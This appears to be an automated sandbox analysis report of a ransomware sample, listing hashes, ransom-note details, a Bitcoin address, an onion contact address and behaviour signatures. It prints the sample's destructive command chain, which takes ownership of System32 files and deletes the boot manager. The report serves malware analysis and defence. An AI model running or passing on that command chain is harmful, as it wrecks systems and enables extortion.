Analysis
-
max time kernel
153s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
22-09-2022 17:42
Behavioral task
behavioral1
Sample
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
Resource
win10v2004-20220812-en
General
-
Target
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
-
Size
6.1MB
-
MD5
04df8dd30da8b5853f48cc1ac9b695a8
-
SHA1
4c02262c2fea0e99277a99dcbe28a9c370b87c39
-
SHA256
78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201
-
SHA512
3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e
-
SSDEEP
3072:jnsbblTAByHNgb0nbYlwKsw962CpJid72gqV/6c4LNobbamucc3OD4iEDzyEaE0u:jnsq7hQplBdJ7bP4L8rVE
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
131fjhrB4wH8j6adZXudp1Wn23pR33tpAh
http://mail2tor2zyjdctd.onion/
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe -
Disables Task Manager via registry modification
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exedescription ioc process File renamed C:\Users\Admin\Pictures\ConvertFromApprove.crw => C:\Users\Admin\Pictures\ConvertFromApprove.crw.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe File renamed C:\Users\Admin\Pictures\OptimizeExpand.crw => C:\Users\Admin\Pictures\OptimizeExpand.crw.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe File renamed C:\Users\Admin\Pictures\CloseOpen.crw => C:\Users\Admin\Pictures\CloseOpen.crw.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe -
Possible privilege escalation attempt 7 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exepid process 212 icacls.exe 1680 takeown.exe 1124 icacls.exe 3084 takeown.exe 3536 icacls.exe 3440 takeown.exe 3488 takeown.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe -
Modifies file permissions 1 TTPs 7 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exepid process 1680 takeown.exe 1124 icacls.exe 3084 takeown.exe 3536 icacls.exe 3440 takeown.exe 3488 takeown.exe 212 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wp.bmp" HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 1472 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exepid process 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe Token: SeDebugPrivilege 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe Token: SeTakeOwnershipPrivilege 3488 takeown.exe Token: SeTakeOwnershipPrivilege 1680 takeown.exe Token: SeTakeOwnershipPrivilege 3084 takeown.exe Token: SeTakeOwnershipPrivilege 3440 takeown.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.execmd.execmd.exedescription pid process target process PID 5056 wrote to memory of 3336 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe cmd.exe PID 5056 wrote to memory of 3336 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe cmd.exe PID 3336 wrote to memory of 3488 3336 cmd.exe takeown.exe PID 3336 wrote to memory of 3488 3336 cmd.exe takeown.exe PID 3336 wrote to memory of 212 3336 cmd.exe icacls.exe PID 3336 wrote to memory of 212 3336 cmd.exe icacls.exe PID 3336 wrote to memory of 1680 3336 cmd.exe takeown.exe PID 3336 wrote to memory of 1680 3336 cmd.exe takeown.exe PID 3336 wrote to memory of 1124 3336 cmd.exe icacls.exe PID 3336 wrote to memory of 1124 3336 cmd.exe icacls.exe PID 3336 wrote to memory of 3084 3336 cmd.exe takeown.exe PID 3336 wrote to memory of 3084 3336 cmd.exe takeown.exe PID 3336 wrote to memory of 3536 3336 cmd.exe icacls.exe PID 3336 wrote to memory of 3536 3336 cmd.exe icacls.exe PID 3336 wrote to memory of 3440 3336 cmd.exe takeown.exe PID 3336 wrote to memory of 3440 3336 cmd.exe takeown.exe PID 5056 wrote to memory of 4972 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe cmd.exe PID 5056 wrote to memory of 4972 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe cmd.exe PID 5056 wrote to memory of 1472 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe NOTEPAD.EXE PID 5056 wrote to memory of 1472 5056 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe NOTEPAD.EXE PID 4972 wrote to memory of 4832 4972 cmd.exe rundll32.exe PID 4972 wrote to memory of 4832 4972 cmd.exe rundll32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe"1⤵
- Modifies WinLogon for persistence
- Modifies extensions of user files
- Checks computer location settings
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit2⤵
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3488
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:212
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1124
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3084
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\LogonUI.exe /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3536
-
-
C:\Windows\system32\takeown.exetakeown /f C:\bootmgr3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit2⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\system32\rundll32.exerundll32 user32.dll,UpdatePerUserSystemParameters3⤵PID:4832
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1472
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57db09a04d53ec49b19596d7836ac2286
SHA1f92b734a6fd58d4a729d14f32bd69d588d03fb70
SHA256eb07471b556a3a18b04c9f14d98f0d8345f6a249a74eea2148af19b50c97c5e7
SHA512fc597891e55cfd69aaf709d20f89c088c6e4632a0f1b3286aaee2d22f98a7f01aaff1f8ec2660086f3434a02d4ea9fa0a5df60eac95abe9be56be8aee6d92897